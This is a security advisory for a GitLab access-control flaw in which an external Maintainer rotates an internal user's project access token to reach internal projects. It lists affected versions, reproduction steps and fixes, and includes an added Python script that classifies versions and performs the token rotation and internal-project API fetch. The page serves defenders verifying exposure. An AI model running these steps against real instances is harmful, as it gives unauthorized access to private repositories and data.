GitLab
cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*, +2 more
- >= 16.0, < 17.8.6
- >= 17.9, < 17.9.3
- >= 17.10, < 17.10.1
A vulnerability exists in GitLab CE/EE versions 16.0 prior to 17.8.6, 17.9 prior to 17.9.3, and 17.10 prior to 17.10.1. This issue allows external users to gain unauthorized access to internal projects by exploiting project access tokens. An external user with the Maintainer role on a project can rotate a project access token created by an internal user; the rotated token is not restricted to the external user's visibility, so it grants access to internal projects and the sensitive data they hold. With the rotated token the external user can also create new internal projects and interact with them, for example by posting issues.
Exploitation of this vulnerability allows an external user holding the rotated token to read and clone internal repositories, potentially leaking sensitive data. If the token carries the appropriate scopes, the external user can additionally create and manage internal projects.
To reproduce this vulnerability, an internal user creates a private project and invites an external user to it with the Maintainer role. The internal user then generates a project access token with the api scope. The external user rotates this token and uses the newly issued token against the GitLab API, which grants access to internal projects. To verify, request an internal project with the rotated token via the API: the request succeeds, whereas the same external user opening that project in the GitLab web interface receives a '404 Not Found' error.
This vulnerability has been addressed in GitLab. Upgrade to GitLab 17.8.6, 17.9.3, or 17.10.1 (or later) for the respective release line.
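The following script is an added example written for this page; it is not GitLab's own code and does not appear in the original advisory. It encodes the affected version ranges listed above so a version string (for example the one returned by the instance's `/api/v4/version` endpoint) can be classified offline, and it wraps the two API calls a tester needs to confirm the behaviour described in the reproduction steps: rotating a project access token (`POST /projects/:id/access_tokens/:token_id/rotate`) and then fetching an internal project with the rotated token. The base URL, project IDs and tokens are placeholders you supply; only run the rotation against a test instance you control, since rotating a token revokes the old one.

```python
"""Classify a GitLab version against the affected ranges above and,
optionally, verify a rotated project access token against the API.

Added example for this advisory page; not GitLab project code.
"""
import json
import re
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Affected ranges from the advisory: [first affected, first fixed).
AFFECTED_RANGES = (
    ((16, 0, 0), (17, 8, 6)),
    ((17, 9, 0), (17, 9, 3)),
    ((17, 10, 0), (17, 10, 1)),
)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'MAJOR.MINOR[.PATCH]'; edition suffixes such as '-ee' are ignored."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {version!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_affected(version: str) -> bool:
    """True if the version falls inside any of the advisory's affected ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def _api(base_url: str, method: str, path: str, token: str) -> Tuple[int, Optional[dict]]:
    """Minimal GitLab REST v4 call; returns (HTTP status, decoded JSON or None)."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/api/v4{path}",
        method=method,
        headers={"PRIVATE-TOKEN": token},
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, None


def instance_version_is_affected(base_url: str, token: str) -> bool:
    """Query /version (needs an authenticated token) and classify the result."""
    status, body = _api(base_url, "GET", "/version", token)
    if status != 200 or not body:
        raise RuntimeError(f"could not read instance version (HTTP {status})")
    return is_affected(body["version"])


def rotate_project_token(base_url: str, caller_token: str,
                         project_id: int, token_id: int) -> str:
    """Reproduction step: rotate a project access token as the calling user.

    Returns the newly issued token value. The previous token is revoked.
    """
    status, body = _api(
        base_url, "POST",
        f"/projects/{project_id}/access_tokens/{token_id}/rotate",
        caller_token,
    )
    if status != 200 or not body or "token" not in body:
        raise RuntimeError(f"rotation failed (HTTP {status})")
    return body["token"]


def rotated_token_reaches_internal_project(base_url: str, rotated_token: str,
                                           internal_project_id: int) -> bool:
    """Verification step: a 200 with visibility 'internal' means the external
    user's rotated token sees a project their own account cannot (404 in the UI)."""
    status, body = _api(base_url, "GET", f"/projects/{internal_project_id}", rotated_token)
    return status == 200 and bool(body) and body.get("visibility") == "internal"


if __name__ == "__main__":
    # Offline usage: classify the version strings the advisory boundaries imply.
    for v in ("17.8.5", "17.8.6", "17.9.2-ee", "17.9.3", "17.10.0", "17.10.1"):
        print(f"{v:12s} affected={is_affected(v)}")
```

On a patched instance the rotation call made by the external user is the step expected to fail; on an affected instance it succeeds and `rotated_token_reaches_internal_project` returns True for a project the external account cannot open in the web UI.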